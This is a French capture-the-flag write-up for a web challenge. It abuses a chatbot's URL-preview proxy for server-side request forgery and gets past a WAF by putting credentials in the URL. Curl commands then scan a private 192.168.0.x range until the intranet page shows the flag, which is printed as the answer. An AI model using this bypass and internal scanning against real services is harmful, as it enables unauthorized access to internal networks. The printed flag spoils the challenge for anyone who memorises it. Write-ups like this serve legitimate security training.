# ChatBot (web, 100 points)

## Énoncé

EvilGouv a récemment ouvert un service de chat-bot, vous savez ces trucs que personne n'aime. Bon en plus d'être particulièrement nul, il doit forcément y avoir une faille. Trouvez un moyen d'accéder à l'intranet !

Lien : https://challengecybersec.fr/b34658e7f6221024f8d18a7f0d3497e4

Le flag est de la forme : DGSESIEE{x} avec x un hash 

## Solution

Le lien nous conduit à un chatbot. Rien de très explicite jusque là. On essaie les boutons d'exemple...

![](chatbot.png)

Tiens, lorsqu'une URL apparaît dans le message, on a un aperçu du domaine avec sa favicon. Lançons les
outils de développement web pour voir cela de plus près :

![](réseau.png)

C'est donc le javascript de la page qui déclenche une requête vers une API du chatbot qui jouerait le rôle de proxy.

```console
$ curl -s "https://challengecybersec.fr/b34658e7f6221024f8d18a7f0d3497e4/proxy?url=https://www.qwant.com/" | jq .
{
  "contents": "<!doctype html>\n<html lang=\"en\">\n<head>...</html>\n<!-- This comment is expected by the docker HEALTHCHECK  -->\n<!-- see: CI-177 -->",
  "title": "Qwant",
  "icon": "https://www.qwant.com/favicon.ico?1539938515"
}
```

Intéressant, pourrait-on utiliser cette fonctionnalité pour aller requêter l'intranet à notre place ? On 
joue pendant quelques minutes après pour obtenir un peu plus d'informations. Seuls les protocoles http:// 
et https:// sont autorisés (pas moyen de tenter file://... ;-) ). Les erreurs sont parfois retournées par
un `Not found`, ou un `{ "err" : <code> }`. C'est aussi le cas des redirections. 

On apprend, en lisant attentivement les commentaires, qu'il s'agit de trouver le LAN sur lequel requêter, 
mais que c'est standard et assez évident (192.168.X.X ?). Après des scans vains, on voit des indices 
indiquant qu'il y a une subtilité à contourner **avant** de scanner le LAN.

Après de longs essais, et un peu moins de cheveux sur le caillou, on comprend ce qui se passe : il y a
probablement un WAF qui se déclenche à l'évocation du LAN, et qui nous retourne un `Forbidden` abrupt. Il
s'agit alors d'essayer des techniques de contournement en croisant les doigts pour que le message change.

Après avoir éliminé les entêtes HTTP qui pourraient faire croire qu'on vient d'un proxy (X-Forwarded-For &
compagnie), joué avec le Content-Type, le Referer et j'en passe, c'est finalement une idée toute bête qui
passe : ajouter une authentification directement dans l'URL !

```console
$ curl -s "https://challengecybersec.fr/b34658e7f6221024f8d18a7f0d3497e4/proxy?url=http://192.168.1.1/" ; echo
Forbidden
$ curl -s "https://challengecybersec.fr/b34658e7f6221024f8d18a7f0d3497e4/proxy?url=http://plop:coin@192.168.0.1/" ; echo
Not Found
```

Pour savoir si la piste est bonne, on va commencer à scanner le 192.168.0.1/24 à partir de cette hypothèse.

```console
$ for i in $(seq 1 255); do echo -n "$i : "; curl -s "https://challengecybersec.fr/b34658e7f6221024f8d18a7f0d3497e4/proxy?url=http://plop:coin@192.168.0.$i/" ; echo; done
1 : Not Found
2 : Not Found
3 : Not Found
[...]
70 : {"contents":"<!DOCTYPE html>\n<html>\n\n<head>\n  <meta charset=\"utf-8\">\n  <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\n  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\">\n  <link href=\"/35e334a1ef338faf064da9eb5f861d3c/fontawesome/css/all.min.css\" rel=\"stylesheet\">\n  <link href=\"/35e334a1ef338faf064da9eb5f861d3c/bootstrap/css/bootstrap.min.css\" rel=\"stylesheet\">\n  <link href=\"/35e334a1ef338faf064da9eb5f861d3c/css/style_index.css\" rel=\"stylesheet\">\n  <link rel=\"icon\" href=\"/35e334a1ef338faf064da9eb5f861d3c/img/favicon.ico\" />\n  <title>Evil Gouv intranet</title>\n</head>\n\n<body>\n  <div>\n    <h1>FLAG DGSESIEE{2cf1655ac88a52d3fe96cb60c371a838}</h1>\n</div>\n</body>\n<script src=\"/35e334a1ef338faf064da9eb5f861d3c/js/jquery-3.5.1.min.js\"></script>\n<script src=\"/35e334a1ef338faf064da9eb5f861d3c/js/popper.min.js\"></script>\n<script src=\"/35e334a1ef338faf064da9eb5f861d3c/js/bootstrap.min.js\"></script>\n\n</html>","title":"Evil Gouv intranet","icon":"Null"}
```

Bingo ! Et le flag est donc `DGSESIEE{2cf1655ac88a52d3fe96cb60c371a838}`.